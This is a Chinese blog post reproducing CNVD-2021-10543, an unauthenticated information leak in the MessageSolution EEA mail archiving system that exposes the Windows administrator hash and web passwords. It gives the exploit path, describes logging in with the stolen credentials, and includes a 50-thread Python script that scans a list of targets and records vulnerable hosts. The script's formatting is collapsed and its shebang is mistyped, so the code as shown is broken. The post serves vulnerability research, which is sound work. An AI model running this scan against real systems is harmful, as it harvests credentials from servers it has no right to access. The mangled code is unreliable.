MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现
一、简介
MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码
二、影响产品
MessageSolution 企业邮件归档管理系统EEA
三、漏洞复现
访问页面:
存在漏洞poc路径:
http://127.0.0.1/authenticationserverservlet/访问地址出现密码:
利用获取账户密码登陆系统:
检测过程:
编写一个简单的检测脚本:
脚本:
#!/usr/bin/enc python
# _*_ coding: utf-8 _*_
import requests
import os
import sys
import threading
from multiprocessing.dummy import Pool
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
file = str(sys.argv[1])
write = sys.argv[2]
readfile = open(file , 'r' , encoding='UTF-8')
writefile = open(write , 'a')
ff = readfile.readlines()
def webhttp():for line in ff:try:line = line.rstrip("\n")payload = "/authenticationserverservlet/"url = line + payloadreq = requests.get(url, verify=False, timeout=1)status = req.status_codeprint(req.text)if 'administrator' in req.text:print(url+" -------------存在漏洞-------------")writefile.write(url)writefile.write('\n')else :print(url+" 不存在漏洞")passexcept OSError:pass
def main():#f = threading.Thread(target=webhttp)pool = Pool(50)f = pool.apply_async(func=webhttp)pool.close()pool.join()readfile.close()writefile.close()
if __name__=="__main__":main()参考:
https://mp.weixin.qq.com/s/PQaOqCem2dhp3CijN5MdKg
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
语雀博客主页:https://www.yuque.com/thelostworld
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现相关推荐
- CNVD-2021-10543 -- MessageSolution 邮件归档系统EEA 信息泄露漏洞
MessageSolution 邮件归档系统EEA 信息泄露漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042获取敏感信息 ...
- MessageSolution 邮件归档系统EEA 信息泄露(CNVD-2021-10543)
0x01 前言 MessageSolution是企业电子邮件归档软件的开发商.MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞. 0x02 漏洞影响 攻击者可利用漏洞获取Win ...
- MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543)
MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543) 1.漏洞描述 MessageSolution企业邮件归档管理系统 / MessageSoluti ...
- 基于MessageSolution 邮件归档系统EEA的通用型信息泄露漏洞挖洞
前几天无意间看到这个通用型漏洞,编号是CNVD-2021-10543,想着也来试试.MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统.该系 ...
- 【数据安全案例】北京购车摇号查询系统出现信息泄露漏洞
北京市小客车指标调控管理信息系统网站在公布摇号结果后,由于其网站设计的bug,在查询信息的时候会造成信息泄漏,例如这个报道有介绍.有中签者发现,登录系统后通过网页浏览的方式查看其中签通知书时,自己的申 ...
- MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞(CNVD-2021-10543)
漏洞描述 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统. 该系统存在通用WEB信息泄漏,泄露Windows服务器administrat ...
- Coremail邮件系统存在配置信息泄露漏洞(CNVD-2019-16798)
安全公告编号: CNTA-2019-0020 2019年5月22日,国家信息安全漏洞共享平台(CNVD)收录了由北京天融信网络安全技术有限公司报送的Coremail邮件系统配置信息泄露漏洞(CNVD- ...
- php unpack linux,PHP unpack()函数中断处理信息泄露漏洞
发布日期:2010-05-31 更新日期:2010-06-28 受影响系统: PHP PHP <= 5.3.2 PHP PHP <= 5.2.13 描述: ---------------- ...
- 配置snmp_多种设备基于 SNMP 协议的敏感信息泄露漏洞数据分析报告
作者:知道创宇404实验室 1. 更新情况 2. 事件概述 SNMP协议[1],即简单网络管理协议(SNMP,Simple Network Management Protocol),默认端口为 161 ...
最新文章
- Visual Studio调试之符号文件
- 算法 求两个自然数的最大公约数 C++
- python 时序数据库_时序数据库InfluxDB
- 【Linux】一步一步学Linux——seq命令(221)
- 计算机英语 考研 翻译,研究生英语翻译笔记
- [机器学习]-[数据预处理]-中心化 缩放 KNN(二)
- MySQL日志(一条sql更新语句是如何执行的)
- 社区团购微信小程序开发
- 金蝶k3 使用两台服务器的优势,金蝶k3报价系统优势如何,电商企业应用尤为明显...
- 2015-5-23PDF的下载链接
- 揭密征途赚钱模式:史玉柱在赚谁的钱
- Python df.groupby(a,as_index=False)[‘‘].sum().sort_values(‘‘,ascending=False).reset_index(drop=True)
- 在html如何设计页面大小,网页设计中页面尺寸标准
- “21天好习惯”第一期- 11 反爬虫机制详解(3)
- 搭建一套直播平台需要多少钱
- 用户使用报告_分享最新2020年抖音用户画像报告
- 大数据Java基础一
- Javascript变量名混淆细节
- 2.微处理器:8088功能结构图【BIU 和 EU】 + 8088【内部各寄存器】的解释
- 关于1000BASE-T1 1000BASE-TX和100BASE-T1